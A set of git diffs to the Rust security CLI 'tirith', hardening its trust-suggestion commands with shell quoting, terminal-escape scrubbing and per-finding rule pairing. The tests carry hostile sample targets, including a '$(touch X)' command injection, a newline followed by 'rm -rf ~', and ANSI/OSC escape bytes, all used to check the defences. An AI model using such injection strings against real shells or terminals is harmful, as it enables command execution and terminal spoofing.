-        let fallback =
-            "https://github.com/sheeki03/tirith/releases/latest/download/threatdb-manifest.json";
+        // Reference the real consts so this test tracks them and never goes stale
+        // when a URL changes (e.g. the fallback moving to the rolling release).
+        let primary = super::MANIFEST_URL_PRIMARY;
+        let fallback = super::MANIFEST_URL_FALLBACK;
 
         let pk = super::manifest_cache_key(primary);
         let fk = super::manifest_cache_key(fallback);

--- a/crates/tirith/src/cli/threatdb_cmd.rs
+++ b/crates/tirith/src/cli/threatdb_cmd.rs
@@ -522,10 +522,10 @@ pub fn status(json: bool) -> i32 {
 }
 
 #[derive(Debug, serde::Serialize)]
-struct ThreatDbStatus {
-    installed: bool,
-    path: Option<String>,
-    age_hours: Option<f64>,
+pub(crate) struct ThreatDbStatus {
+    pub(crate) installed: bool,
+    pub(crate) path: Option<String>,
+    pub(crate) age_hours: Option<f64>,
     build_timestamp: Option<u64>,
     build_sequence: Option<u64>,
     package_count: Option<u32>,
@@ -535,12 +535,12 @@ struct ThreatDbStatus {
     popular_count: Option<u32>,
     total_entries: Option<u32>,
     skipped_range_only: Option<u32>,
-    signature_valid: Option<bool>,
-    stale: bool,
+    pub(crate) signature_valid: Option<bool>,
+    pub(crate) stale: bool,
     error: Option<String>,
 }
 
-fn gather_status() -> ThreatDbStatus {
+pub(crate) fn gather_status() -> ThreatDbStatus {
     let db_path = ThreatDb::default_path();
     let path_str = db_path.as_ref().map(|p| p.display().to_string());
 

--- a/crates/tirith/src/cli/trust.rs
+++ b/crates/tirith/src/cli/trust.rs
@@ -847,20 +847,27 @@ fn suggestion_lines(pairs: &[(String, Option<String>)]) -> Vec<String> {
 fn format_add_line(target: &str, rule_id: Option<&str>, needs_broad: bool) -> String {
     // The target is attacker-controlled (a URL/host pulled from the trigger's
     // finding evidence) and this line is printed for the operator to copy/paste
-    // into a shell. Shell-single-quote it so a target carrying `$( )`, backticks,
-    // `;`, spaces, a `>` redirect, or a glob cannot execute on paste. If it can't
-    // be safely quoted (e.g. it contains a newline), do NOT emit a runnable
-    // command — print a safe manual-trust note instead. The `--rule <rid>` is a
-    // snake_case enum Display (not attacker-controlled), so it needs no quoting.
-    let Some(quoted) = tirith_core::safe_command::shell_single_quote(target) else {
+    // into a shell. Scrub terminal-control bytes first, then shell-single-quote.
+    // The scrub (`sanitize_text_str`, same filter `output.rs::write_block_advisories`
+    // applies to blocklist URLs) strips ANSI/OSC/zero-width bytes so the target
+    // cannot repaint the operator's terminal at suggest time. The single-quote
+    // then keeps a target carrying `$( )`, backticks, `;`, spaces, a `>` redirect,
+    // or a glob from executing on paste. If it can't be safely quoted (e.g. it
+    // contains a newline), do NOT emit a runnable command — print a safe
+    // manual-trust note instead. The `--rule <rid>` is a snake_case enum Display
+    // (not attacker-controlled), so it needs no quoting. The printed `--ttl` uses
+    // `DEFAULT_TTL`, the same value `--apply` resolves to (see `from_last_trigger`),
+    // so the suggestion and the applied entry can't drift.
+    let scrubbed = tirith_core::mcp::output_filter::sanitize_text_str(target);
+    let Some(quoted) = tirith_core::safe_command::shell_single_quote(&scrubbed) else {
         return "# trust this target manually with `tirith trust add` \
                 (it contains characters unsafe to embed in a suggested command)."
             .to_string();
     };
     let broad = if needs_broad { " --broad" } else { "" };
     match rule_id {
-        Some(rid) => format!("tirith trust add {quoted}{broad} --rule {rid} --ttl 30d"),
-        None => format!("tirith trust add {quoted}{broad} --ttl 30d"),
+        Some(rid) => format!("tirith trust add {quoted}{broad} --rule {rid} --ttl {DEFAULT_TTL}"),
+        None => format!("tirith trust add {quoted}{broad} --ttl {DEFAULT_TTL}"),
     }
 }
 
@@ -907,10 +914,14 @@ pub fn from_last_trigger(apply: bool) -> i32 {
     let mut added = 0;
     for (target, rule_id) in &pairs {
         let broad = classify_scope(target).is_broad();
+        // Pass DEFAULT_TTL explicitly (not None) so the applied entry uses the
+        // same source the printed suggestion's `--ttl {DEFAULT_TTL}` does. `add()`
+        // would resolve None to DEFAULT_TTL anyway, but sharing the one constant
+        // keeps suggest and apply from drifting on separate literals.
         if add(
             target,
             rule_id.as_deref(),
-            None,
+            Some(DEFAULT_TTL),
             false,
             broad,
             None,
@@ -2377,6 +2388,26 @@ mod tests {
             format_add_line("evil.example/a\nrm -rf ~", Some("confusable_domain"), true),
             "# trust this target manually with `tirith trust add` \
              (it contains characters unsafe to embed in a suggested command)."
+        );
+
+        // Defense-in-depth: ANSI/OSC escape bytes in the target are scrubbed
+        // BEFORE quoting (single-quoting blocks shell execution, but a raw ESC
+        // could still spoof the operator's terminal as the line is printed). The
+        // emitted line must carry no raw ESC (0x1B) byte.
+        let osc = format_add_line(
+            "evil.example/\u{1b}]0;pwned\u{7}\u{1b}[31m",
+            Some("confusable_domain"),
+            true,
+        );
+        assert!(
+            !osc.contains('\u{1b}'),
+            "ESC (0x1B) must be scrubbed before the suggestion is printed: {osc:?}"
+        );
+        // The scrub strips the control bytes but keeps the printable remainder,
+        // so this is still a runnable (single-quoted) trust command.
+        assert!(
+            osc.contains("tirith trust add"),
+            "scrubbed target should still yield a runnable trust line: {osc:?}"
         );
     }
 

--- a/crates/tirith/src/cli/trust.rs
+++ b/crates/tirith/src/cli/trust.rs
@@ -758,91 +758,109 @@ fn load_last_trigger_value() -> Result<Option<serde_json::Value>, String> {
     Ok(Some(val))
 }
 
-/// Extract trust targets and rule IDs from a parsed `last_trigger.json`.
+/// Extract `(target, rule_id)` PAIRS from a parsed `last_trigger.json`.
 ///
-/// `targets` prefer a FULL URL when the finding evidence carries one (a `raw`
-/// string with a scheme that parses) so the suggested trust can be narrow; it
-/// falls back to a bare host/domain otherwise. Order and de-dup mirror the way
-/// `last()` walks findings (per-finding `raw` first, then `raw_host`).
-fn extract_targets_and_rules(val: &serde_json::Value) -> (Vec<String>, Vec<String>) {
-    let mut targets: Vec<String> = Vec::new();
-    let push = |t: String, targets: &mut Vec<String>| {
-        if !t.is_empty() && !targets.contains(&t) {
-            targets.push(t);
+/// Pairing is PER FINDING: each finding carries its OWN `rule_id` and its own
+/// `evidence`, so a target pulled from a finding's evidence is paired with THAT
+/// finding's `rule_id` — never the flat top-level `rule_ids` array. Pairing
+/// against the top-level array would form a cartesian product, so for a
+/// multi-finding trigger `--apply` could trust URL A under rule B even though
+/// rule B fired for a DIFFERENT target.
+///
+/// Each target prefers a FULL URL when the evidence carries one (a `raw` string
+/// with a scheme that parses) so the suggested trust can be narrow; it falls
+/// back to a bare host/domain otherwise. Per-finding `raw` is read before
+/// `raw_host`, mirroring how `last()` walks findings. A finding with no
+/// extractable rule_id yields `(target, None)`. Results are de-duped on the full
+/// `(target, rule_id)` pair, so the same URL flagged by two different rules
+/// keeps both pairings.
+fn extract_target_rule_pairs(val: &serde_json::Value) -> Vec<(String, Option<String>)> {
+    let mut pairs: Vec<(String, Option<String>)> = Vec::new();
+    let push = |t: String, rid: &Option<String>, pairs: &mut Vec<(String, Option<String>)>| {
+        if t.is_empty() {
+            return;
+        }
+        let pair = (t, rid.clone());
+        if !pairs.contains(&pair) {
+            pairs.push(pair);
         }
     };
     if let Some(findings) = val.get("findings").and_then(|v| v.as_array()) {
         for finding in findings {
+            // THIS finding's own rule id — paired with every target it produces.
+            let rule_id = finding
+                .get("rule_id")
+                .and_then(|v| v.as_str())
+                .map(String::from);
             if let Some(evidence) = finding.get("evidence").and_then(|v| v.as_array()) {
                 for ev in evidence {
                     if let Some(raw) = ev.get("raw").and_then(|v| v.as_str()) {
                         // Prefer the full URL when `raw` is one; else fall back
                         // to the bare host so we still have something to trust.
                         if raw.contains("://") && url::Url::parse(raw).is_ok() {
-                            push(raw.to_string(), &mut targets);
+                            push(raw.to_string(), &rule_id, &mut pairs);
                         } else if let Some(host) = extract_host(raw) {
-                            push(host, &mut targets);
+                            push(host, &rule_id, &mut pairs);
                         }
                     }
                     if let Some(host) = ev.get("raw_host").and_then(|v| v.as_str()) {
-                        push(host.to_string(), &mut targets);
+                        push(host.to_string(), &rule_id, &mut pairs);
                     }
                 }
             }
         }
     }
 
-    let rule_ids: Vec<String> = val
-        .get("rule_ids")
-        .and_then(|v| v.as_array())
-        .map(|arr| {
-            arr.iter()
-                .filter_map(|v| v.as_str().map(String::from))
-                .collect()
-        })
-        .unwrap_or_default();
-
-    (targets, rule_ids)
+    pairs
 }
 
-/// Read + parse + extract in one step: `(targets, rule_ids)`.
+/// Read + parse + extract in one step: per-finding `(target, rule_id)` pairs.
 ///
-/// `targets` prefer full URLs, else bare domains (see `extract_targets_and_rules`).
-/// `Err` covers both "no recent trigger" (so callers can print a friendly note)
-/// and real read/parse failures.
-fn read_last_trigger() -> Result<(Vec<String>, Vec<String>), String> {
+/// Each target prefers a full URL, else a bare domain (see
+/// `extract_target_rule_pairs`). `Err` covers both "no recent trigger" (so
+/// callers can print a friendly note) and real read/parse failures.
+fn read_last_trigger() -> Result<Vec<(String, Option<String>)>, String> {
     match load_last_trigger_value()? {
-        Some(val) => Ok(extract_targets_and_rules(&val)),
+        Some(val) => Ok(extract_target_rule_pairs(&val)),
         None => Err("no recent trigger found".into()),
     }
 }
 
 /// Build the ready-to-run `tirith trust add` suggestion lines for each
-/// (target, rule_id) pair. A full-URL target is narrow, so it is suggested
-/// without `--broad`; a bare domain needs `--broad` because `trust add` rejects
-/// broad scopes without the opt-in (see `add()` / `classify_scope`).
-fn suggestion_lines(targets: &[String], rule_ids: &[String]) -> Vec<String> {
-    let mut lines = Vec::new();
-    for target in targets {
-        // A target that classifies as broad (bare domain/wildcard/TLD) needs
-        // `--broad`; a full URL (or any narrow pattern) does not.
-        let needs_broad = classify_scope(target).is_broad();
-        if rule_ids.is_empty() {
-            lines.push(format_add_line(target, None, needs_broad));
-        } else {
-            for rid in rule_ids {
-                lines.push(format_add_line(target, Some(rid), needs_broad));
-            }
-        }
-    }
-    lines
+/// per-finding `(target, rule_id)` pair. A full-URL target is narrow, so it is
+/// suggested without `--broad`; a bare domain needs `--broad` because
+/// `trust add` rejects broad scopes without the opt-in (see `add()` /
+/// `classify_scope`). Each pair carries ITS OWN rule id, so a rule is never
+/// suggested for a target it didn't fire on.
+fn suggestion_lines(pairs: &[(String, Option<String>)]) -> Vec<String> {
+    pairs
+        .iter()
+        .map(|(target, rule_id)| {
+            // A target that classifies as broad (bare domain/wildcard/TLD) needs
+            // `--broad`; a full URL (or any narrow pattern) does not.
+            let needs_broad = classify_scope(target).is_broad();
+            format_add_line(target, rule_id.as_deref(), needs_broad)
+        })
+        .collect()
 }
 
 fn format_add_line(target: &str, rule_id: Option<&str>, needs_broad: bool) -> String {
+    // The target is attacker-controlled (a URL/host pulled from the trigger's
+    // finding evidence) and this line is printed for the operator to copy/paste
+    // into a shell. Shell-single-quote it so a target carrying `$( )`, backticks,
+    // `;`, spaces, a `>` redirect, or a glob cannot execute on paste. If it can't
+    // be safely quoted (e.g. it contains a newline), do NOT emit a runnable
+    // command — print a safe manual-trust note instead. The `--rule <rid>` is a
+    // snake_case enum Display (not attacker-controlled), so it needs no quoting.
+    let Some(quoted) = tirith_core::safe_command::shell_single_quote(target) else {
+        return "# trust this target manually with `tirith trust add` \
+                (it contains characters unsafe to embed in a suggested command)."
+            .to_string();
+    };
     let broad = if needs_broad { " --broad" } else { "" };
     match rule_id {
-        Some(rid) => format!("tirith trust add {target}{broad} --rule {rid} --ttl 30d"),
-        None => format!("tirith trust add {target}{broad} --ttl 30d"),
+        Some(rid) => format!("tirith trust add {quoted}{broad} --rule {rid} --ttl 30d"),
+        None => format!("tirith trust add {quoted}{broad} --ttl 30d"),
     }
 }
 
@@ -853,7 +871,7 @@ fn format_add_line(target: &str, rule_id: Option<&str>, needs_broad: bool) -> St
 /// Print-only by default mirrors the codebase's `policy tune` stance: suggest,
 /// don't mutate.
 pub fn from_last_trigger(apply: bool) -> i32 {
-    let (targets, rule_ids) = match read_last_trigger() {
+    let pairs = match read_last_trigger() {
         Ok(v) => v,
         // A missing/empty trigger is not an error for this command -- it is the
         // common "nothing happened yet" case, so exit 0 with a friendly note.
@@ -867,7 +885,7 @@ pub fn from_last_trigger(apply: bool) -> i32 {
         }
     };
 
-    if targets.is_empty() {
+    if pairs.is_empty() {
         eprintln!("tirith: no recent trigger to trust");
         return 0;
     }
@@ -875,7 +893,7 @@ pub fn from_last_trigger(apply: bool) -> i32 {
     if !apply {
         eprintln!("Suggested trust commands (run the narrowest one that fits):");
         eprintln!();
-        for line in suggestion_lines(&targets, &rule_ids) {
+        for line in suggestion_lines(&pairs) {
             println!("{line}");
         }
         eprintln!();
@@ -883,21 +901,24 @@ pub fn from_last_trigger(apply: bool) -> i32 {
         return 0;
     }
 
-    // --apply: actually add each entry. A bare-domain target is broad, so pass
-    // `broad = true`; a full-URL (narrow) target does not need it.
+    // --apply: actually add each per-finding entry, pairing each target with ITS
+    // OWN rule id (never a rule that fired on a different target). A bare-domain
+    // target is broad, so pass `broad = true`; a full-URL (narrow) one does not.
     let mut added = 0;
-    for target in &targets {
+    for (target, rule_id) in &pairs {
         let broad = classify_scope(target).is_broad();
-        if rule_ids.is_empty() {
-            if add(target, None, None, false, broad, None, "user", false) == 0 {
-                added += 1;
-            }
-        } else {
-            for rid in &rule_ids {
-                if add(target, Some(rid), None, false, broad, None, "user", false) == 0 {
-                    added += 1;
-                }
-            }
+        if add(
+            target,
+            rule_id.as_deref(),
+            None,
+            false,
+            broad,
+            None,
+            "user",
+            false,
+        ) == 0
+        {
+            added += 1;
         }
     }
 
@@ -2166,7 +2187,8 @@ mod tests {
     }
 
     /// A full-URL evidence target is suggested NARROW: a copy/paste-ready
-    /// `tirith trust add <url> --rule <rule_id> --ttl 30d` line with NO `--broad`.
+    /// `tirith trust add '<url>' --rule <rule_id> --ttl 30d` line (URL
+    /// single-quoted) with NO `--broad`.
     #[test]
     fn from_last_trigger_suggests_narrow_url_without_broad() {
         let json = r#"{
@@ -2176,6 +2198,7 @@ mod tests {
             "timestamp": "2026-06-10T00:00:00Z",
             "findings": [
                 {
+                    "rule_id": "shortened_url",
                     "title": "Shortened URL",
                     "evidence": [
                         { "raw": "https://example.com/install.sh" }
@@ -2185,18 +2208,24 @@ mod tests {
         }"#;
 
         with_seeded_last_trigger(json, || {
-            // read_last_trigger prefers the FULL URL as the target.
-            let (targets, rule_ids) = read_last_trigger().expect("read_last_trigger");
-            assert_eq!(targets, vec!["https://example.com/install.sh".to_string()]);
-            assert_eq!(rule_ids, vec!["shortened_url".to_string()]);
+            // read_last_trigger prefers the FULL URL as the target and pairs it
+            // with THAT finding's rule_id.
+            let pairs = read_last_trigger().expect("read_last_trigger");
+            assert_eq!(
+                pairs,
+                vec![(
+                    "https://example.com/install.sh".to_string(),
+                    Some("shortened_url".to_string())
+                )]
+            );
 
-            // The suggested line is the narrow, no-`--broad` form.
-            let lines = suggestion_lines(&targets, &rule_ids);
+            // The suggested line is the narrow, single-quoted, no-`--broad` form.
+            let lines = suggestion_lines(&pairs);
             let expected =
-                "tirith trust add https://example.com/install.sh --rule shortened_url --ttl 30d";
+                "tirith trust add 'https://example.com/install.sh' --rule shortened_url --ttl 30d";
             assert!(
                 lines.iter().any(|l| l == expected),
-                "expected narrow URL suggestion {expected:?}, got: {lines:?}"
+                "expected narrow single-quoted URL suggestion {expected:?}, got: {lines:?}"
             );
             assert!(
                 lines.iter().all(|l| !l.contains("--broad")),
@@ -2215,21 +2244,140 @@ mod tests {
         let json = r#"{
             "rule_ids": ["homograph"],
             "findings": [
-                { "title": "Homograph", "evidence": [ { "raw_host": "example.com" } ] }
+                { "rule_id": "homograph", "title": "Homograph", "evidence": [ { "raw_host": "example.com" } ] }
             ]
         }"#;
 
         with_seeded_last_trigger(json, || {
-            let (targets, rule_ids) = read_last_trigger().expect("read_last_trigger");
-            assert_eq!(targets, vec!["example.com".to_string()]);
+            let pairs = read_last_trigger().expect("read_last_trigger");
+            assert_eq!(
+                pairs,
+                vec![("example.com".to_string(), Some("homograph".to_string()))]
+            );
 
-            let lines = suggestion_lines(&targets, &rule_ids);
-            let expected = "tirith trust add example.com --broad --rule homograph --ttl 30d";
+            let lines = suggestion_lines(&pairs);
+            let expected = "tirith trust add 'example.com' --broad --rule homograph --ttl 30d";
             assert!(
                 lines.iter().any(|l| l == expected),
-                "expected bare-domain suggestion with --broad {expected:?}, got: {lines:?}"
+                "expected single-quoted bare-domain suggestion with --broad {expected:?}, got: {lines:?}"
             );
         });
+    }
+
+    /// F2 (P1): a MULTI-finding trigger must pair each target with ITS OWN
+    /// finding's rule_id — never the cartesian product of all targets × all
+    /// top-level `rule_ids`. Here finding A (rule `shortened_url`) fired for
+    /// `https://a.example/x`, finding B (rule `plain_http_to_sink`) for
+    /// `http://b.example/y`. The wrong (old) behavior would suggest trusting A
+    /// under `plain_http_to_sink` and B under `shortened_url`.
+    #[test]
+    fn from_last_trigger_pairs_each_target_with_its_own_rule() {
+        let json = r#"{
+            "rule_ids": ["shortened_url", "plain_http_to_sink"],
+            "findings": [
+                {
+                    "rule_id": "shortened_url",
+                    "title": "Shortened URL",
+                    "evidence": [ { "raw": "https://a.example/x" } ]
+                },
+                {
+                    "rule_id": "plain_http_to_sink",
+                    "title": "Plain HTTP",
+                    "evidence": [ { "raw": "http://b.example/y" } ]
+                }
+            ]
+        }"#;
+
+        with_seeded_last_trigger(json, || {
+            let pairs = read_last_trigger().expect("read_last_trigger");
+            assert_eq!(
+                pairs,
+                vec![
+                    (
+                        "https://a.example/x".to_string(),
+                        Some("shortened_url".to_string())
+                    ),
+                    (
+                        "http://b.example/y".to_string(),
+                        Some("plain_http_to_sink".to_string())
+                    ),
+                ],
+                "each target must keep its own finding's rule_id (no cartesian product)"
+            );
+
+            let lines = suggestion_lines(&pairs);
+            // Exactly the two correct pairings — and NO cross-paired line.
+            assert!(
+                lines.iter().any(|l| l
+                    == "tirith trust add 'https://a.example/x' --rule shortened_url --ttl 30d"),
+                "A must pair with shortened_url: {lines:?}"
+            );
+            assert!(
+                lines.iter().any(|l| l
+                    == "tirith trust add 'http://b.example/y' --rule plain_http_to_sink --ttl 30d"),
+                "B must pair with plain_http_to_sink: {lines:?}"
+            );
+            assert_eq!(
+                lines.len(),
+                2,
+                "exactly two lines, no cartesian product: {lines:?}"
+            );
+            assert!(
+                !lines.iter().any(
+                    |l| l.contains("'https://a.example/x'") && l.contains("plain_http_to_sink")
+                ),
+                "A must NOT be cross-paired with plain_http_to_sink: {lines:?}"
+            );
+            assert!(
+                !lines
+                    .iter()
+                    .any(|l| l.contains("'http://b.example/y'") && l.contains("shortened_url")),
+                "B must NOT be cross-paired with shortened_url: {lines:?}"
+            );
+        });
+    }
+
+    /// F1 (HIGH): the suggestion line is copy/paste-ready, so a hostile target
+    /// carrying shell metacharacters must be single-quoted; a target that can't
+    /// be safely quoted (newline) must NOT yield a runnable command.
+    #[test]
+    fn from_last_trigger_shell_quotes_hostile_target() {
+        // `extract_host` is applied to a schemeless `raw`; use `raw_host` so the
+        // hostile bytes survive verbatim into the suggested line.
+        let json = r#"{
+            "rule_ids": ["confusable_domain"],
+            "findings": [
+                {
+                    "rule_id": "confusable_domain",
+                    "title": "Confusable",
+                    "evidence": [ { "raw_host": "evil.example/$(touch X)" } ]
+                }
+            ]
+        }"#;
+        with_seeded_last_trigger(json, || {
+            let pairs = read_last_trigger().expect("read_last_trigger");
+            let lines = suggestion_lines(&pairs);
+            let line = lines
+                .iter()
+                .find(|l| l.contains("tirith trust add"))
+                .expect("a suggestion line");
+            assert!(
+                line.contains("'evil.example/$(touch X)'"),
+                "hostile target must be single-quoted so $(touch X) cannot execute: {line}"
+            );
+            assert!(
+                !line.replace("'evil.example/$(touch X)'", "").contains("$("),
+                "no bare $( may survive outside the quoted token: {line}"
+            );
+        });
+
+        // A target with a newline cannot be single-quoted as one token → no
+        // runnable command, just the safe manual-trust note.
+        assert_eq!(
+            format_add_line("evil.example/a\nrm -rf ~", Some("confusable_domain"), true),
+            "# trust this target manually with `tirith trust add` \
+             (it contains characters unsafe to embed in a suggested command)."
+        );
     }
 
     /// A missing/empty trigger is the common "nothing happened yet" case:

--- a/crates/tirith/src/cli/trust.rs
+++ b/crates/tirith/src/cli/trust.rs
@@ -814,6 +814,38 @@ fn extract_target_rule_pairs(val: &serde_json::Value) -> Vec<(String, Option<Str
     pairs
 }
 
+/// Normalize a per-finding target to the bare host `last()` displays and
+/// prompts on. `extract_target_rule_pairs` may yield a FULL URL or a bare host;
+/// `last()`'s `domains` list is always a bare host (via `extract_host` /
+/// `raw_host`). Reduce a URL target to its host so a pair can be matched back to
+/// the host the user was actually asked about; a target that is already a bare
+/// host (or any non-URL) maps to itself.
+fn target_host(target: &str) -> String {
+    extract_host(target).unwrap_or_else(|| target.to_string())
+}
+
+/// The rule_id(s) that actually fired for a single host in the last trigger.
+///
+/// Reuses `extract_target_rule_pairs` (the same per-finding source
+/// `from_last_trigger` uses) as the single source of truth, then keeps only the
+/// rules whose finding targeted `host`, never the flat top-level `rule_ids`
+/// array. This is what stops `last()`'s rule-scoped choice from granting one
+/// host every rule in the whole verdict. Results are de-duped, preserving order.
+fn rules_for_host(val: &serde_json::Value, host: &str) -> Vec<String> {
+    let mut rules: Vec<String> = Vec::new();
+    for (target, rule_id) in extract_target_rule_pairs(val) {
+        if target_host(&target) != host {
+            continue;
+        }
+        if let Some(rid) = rule_id {
+            if !rules.contains(&rid) {
+                rules.push(rid);
+            }
+        }
+    }
+    rules
+}
+
 /// Read + parse + extract in one step: per-finding `(target, rule_id)` pairs.
 ///
 /// Each target prefers a full URL, else a bare domain (see
@@ -912,6 +944,7 @@ pub fn from_last_trigger(apply: bool) -> i32 {
     // OWN rule id (never a rule that fired on a different target). A bare-domain
     // target is broad, so pass `broad = true`; a full-URL (narrow) one does not.
     let mut added = 0;
+    let mut failed = 0;
     for (target, rule_id) in &pairs {
         let broad = classify_scope(target).is_broad();
         // Pass DEFAULT_TTL explicitly (not None) so the applied entry uses the
@@ -930,10 +963,19 @@ pub fn from_last_trigger(apply: bool) -> i32 {
         ) == 0
         {
             added += 1;
+        } else {
+            failed += 1;
         }
     }
 
     eprintln!("tirith: added {added} trust entry/entries from last trigger");
+    // A partial apply (some entries rejected by `add()`, e.g. a blocklisted or
+    // control-char target) must NOT exit 0 and masquerade as a clean success --
+    // surface the count and fail loud so the operator knows not every entry stuck.
+    if failed > 0 {
+        eprintln!("tirith: {failed} trust entry/entries could not be added");
+        return 1;
+    }
     0
 }
 
@@ -989,16 +1031,6 @@ pub fn last() -> i32 {
         return 0;
     }
 
-    let rule_ids: Vec<String> = val
-        .get("rule_ids")
-        .and_then(|v| v.as_array())
-        .map(|arr| {
-            arr.iter()
-                .filter_map(|v| v.as_str().map(String::from))
-                .collect()
-        })
-        .unwrap_or_default();
-
     for domain in &domains {
         eprintln!();
         eprint!("Trust {domain}? [y/N/r(rule-scoped)/t(temporary 7d)] ");
@@ -1018,11 +1050,16 @@ pub fn last() -> i32 {
                 add(domain, None, None, false, true, None, "user", false);
             }
             "r" | "rule" => {
-                if rule_ids.is_empty() {
-                    eprintln!("tirith: no rule IDs in last trigger, adding global trust");
+                // Pair this host with ONLY the rule(s) that actually fired for
+                // it (per-finding, from `extract_target_rule_pairs`), not every
+                // top-level rule in the verdict. Trusting one host under a rule
+                // that fired on a DIFFERENT target would be over-broad.
+                let host_rules = rules_for_host(&val, domain);
+                if host_rules.is_empty() {
+                    eprintln!("tirith: no rule IDs for {domain}, adding global trust");
                     add(domain, None, None, false, true, None, "user", false);
                 } else {
-                    for rid in &rule_ids {
+                    for rid in &host_rules {
                         // Rule-scoped trust is narrow by construction.
                         add(domain, Some(rid), None, false, true, None, "user", false);
                     }
@@ -2348,6 +2385,63 @@ mod tests {
         });
     }
 
+    /// `--apply` must fail loud on a PARTIAL apply: if `add()` rejects even one
+    /// entry, the command exits non-zero instead of 0, so a partial result never
+    /// masquerades as a clean success. Here the first finding's target is a valid
+    /// narrow URL (`add()` accepts it -> stored), while the second's `raw_host`
+    /// carries a control byte (0x07 BEL) that `validate_pattern` rejects ->
+    /// `add()` returns 1 for that entry. Both reach the apply loop, so one
+    /// succeeds and one fails: the overall exit must be 1.
+    #[test]
+    fn from_last_trigger_apply_partial_failure_returns_one() {
+        let json = "{\
+            \"rule_ids\": [\"shortened_url\", \"homograph\"],\
+            \"findings\": [\
+                {\
+                    \"rule_id\": \"shortened_url\",\
+                    \"title\": \"Shortened URL\",\
+                    \"evidence\": [ { \"raw\": \"https://good.example/install.sh\" } ]\
+                },\
+                {\
+                    \"rule_id\": \"homograph\",\
+                    \"title\": \"Homograph\",\
+                    \"evidence\": [ { \"raw_host\": \"evil.example\\u0007\" } ]\
+                }\
+            ]\
+        }";
+
+        with_seeded_last_trigger(json, || {
+            // Both targets survive extraction: the good URL and the control-char
+            // host (raw_host is pushed verbatim, no validation at read time).
+            let pairs = read_last_trigger().expect("read_last_trigger");
+            assert_eq!(
+                pairs,
+                vec![
+                    (
+                        "https://good.example/install.sh".to_string(),
+                        Some("shortened_url".to_string())
+                    ),
+                    (
+                        "evil.example\u{0007}".to_string(),
+                        Some("homograph".to_string())
+                    ),
+                ],
+                "both entries must reach the apply loop so one can succeed and one fail"
+            );
+
+            // Suggest (print-only) still exits 0 -- it never calls `add()`.
+            assert_eq!(from_last_trigger(false), 0);
+
+            // --apply: the good URL is stored, the control-char host is rejected
+            // by `validate_pattern` inside `add()`. A partial apply must exit 1.
+            assert_eq!(
+                from_last_trigger(true),
+                1,
+                "a partial apply (one entry rejected by add) must fail loud, not exit 0"
+            );
+        });
+    }
+
     /// F1 (HIGH): the suggestion line is copy/paste-ready, so a hostile target
     /// carrying shell metacharacters must be single-quoted; a target that can't
     /// be safely quoted (newline) must NOT yield a runnable command.
@@ -2409,6 +2503,96 @@ mod tests {
             osc.contains("tirith trust add"),
             "scrubbed target should still yield a runnable trust line: {osc:?}"
         );
+    }
+
+    /// `last()`'s rule-scoped ("r") choice must trust a host under ONLY the
+    /// rule(s) that fired for THAT host, never every top-level rule in the
+    /// verdict. `rules_for_host` is the per-host lookup that branch uses; here
+    /// finding A (rule `shortened_url`) fired for `a.example`, finding B (rule
+    /// `plain_http_to_sink`) for `b.example`. The old `last()` would have added
+    /// BOTH rules to BOTH hosts (over-broad). `rules_for_host` must return each
+    /// host's own single rule.
+    #[test]
+    fn rules_for_host_returns_only_that_hosts_rules() {
+        let val: serde_json::Value = serde_json::from_str(
+            r#"{
+            "rule_ids": ["shortened_url", "plain_http_to_sink"],
+            "findings": [
+                {
+                    "rule_id": "shortened_url",
+                    "title": "Shortened URL",
+                    "evidence": [ { "raw": "https://a.example/x" } ]
+                },
+                {
+                    "rule_id": "plain_http_to_sink",
+                    "title": "Plain HTTP",
+                    "evidence": [ { "raw": "http://b.example/y" } ]
+                }
+            ]
+        }"#,
+        )
+        .unwrap();
+
+        // The display loop / prompt key on the bare host (via `extract_host`).
+        assert_eq!(rules_for_host(&val, "a.example"), vec!["shortened_url"]);
+        assert_eq!(
+            rules_for_host(&val, "b.example"),
+            vec!["plain_http_to_sink"]
+        );
+        // A host that did not trigger gets no rules (falls back to global trust).
+        assert!(rules_for_host(&val, "c.example").is_empty());
+    }
+
+    /// When ONE host triggers MULTIPLE rules, the rule-scoped choice must add
+    /// each of that host's own rules (and de-dupe), not collapse to one.
+    #[test]
+    fn rules_for_host_returns_all_own_rules_deduped() {
+        let val: serde_json::Value = serde_json::from_str(
+            r#"{
+            "rule_ids": ["shortened_url", "plain_http_to_sink", "homograph"],
+            "findings": [
+                {
+                    "rule_id": "shortened_url",
+                    "evidence": [ { "raw": "https://a.example/x" }, { "raw_host": "a.example" } ]
+                },
+                {
+                    "rule_id": "plain_http_to_sink",
+                    "evidence": [ { "raw": "http://a.example/y" } ]
+                },
+                {
+                    "rule_id": "homograph",
+                    "evidence": [ { "raw_host": "b.example" } ]
+                }
+            ]
+        }"#,
+        )
+        .unwrap();
+
+        // a.example fired on two distinct rules across its findings; both are
+        // returned, de-duped despite the repeated `raw`/`raw_host` evidence.
+        assert_eq!(
+            rules_for_host(&val, "a.example"),
+            vec!["shortened_url", "plain_http_to_sink"],
+            "a host with multiple rules keeps all of its own rules, deduped"
+        );
+        // b.example's unrelated rule must NOT leak onto a.example.
+        assert_eq!(rules_for_host(&val, "b.example"), vec!["homograph"]);
+    }
+
+    /// A finding with evidence but no `rule_id` yields a host with no rules, so
+    /// the rule-scoped branch falls back to global trust for that host. (Mirrors
+    /// the old "no rule IDs in last trigger" path, now scoped per-host.)
+    #[test]
+    fn rules_for_host_empty_when_finding_has_no_rule_id() {
+        let val: serde_json::Value = serde_json::from_str(
+            r#"{
+            "findings": [
+                { "title": "Mystery", "evidence": [ { "raw_host": "a.example" } ] }
+            ]
+        }"#,
+        )
+        .unwrap();
+        assert!(rules_for_host(&val, "a.example").is_empty());
     }
 
     /// A missing/empty trigger is the common "nothing happened yet" case:

--- a/crates/tirith/src/cli/trust.rs
+++ b/crates/tirith/src/cli/trust.rs
@@ -738,34 +738,183 @@ pub fn remove(pattern: &str, rule_id: Option<&str>, scope: &str) -> i32 {
     0
 }
 
-/// `tirith trust last` -- show last trigger and offer to trust.
-pub fn last() -> i32 {
-    let data_dir = match tirith_core::policy::data_dir() {
-        Some(d) => d,
-        None => {
-            eprintln!("tirith: cannot determine data directory");
-            return 1;
-        }
-    };
-
+/// Read and JSON-parse `last_trigger.json` from the data dir.
+///
+/// Shared by `last()` (interactive prompt) and `from_last_trigger()` (suggest
+/// ready-to-run commands). Returns the parsed value so each caller can pull the
+/// fields it needs without re-reading the file. `Ok(None)` means there is no
+/// recent trigger on disk (missing file); `Err` is a real read/parse failure.
+fn load_last_trigger_value() -> Result<Option<serde_json::Value>, String> {
+    let data_dir = tirith_core::policy::data_dir()
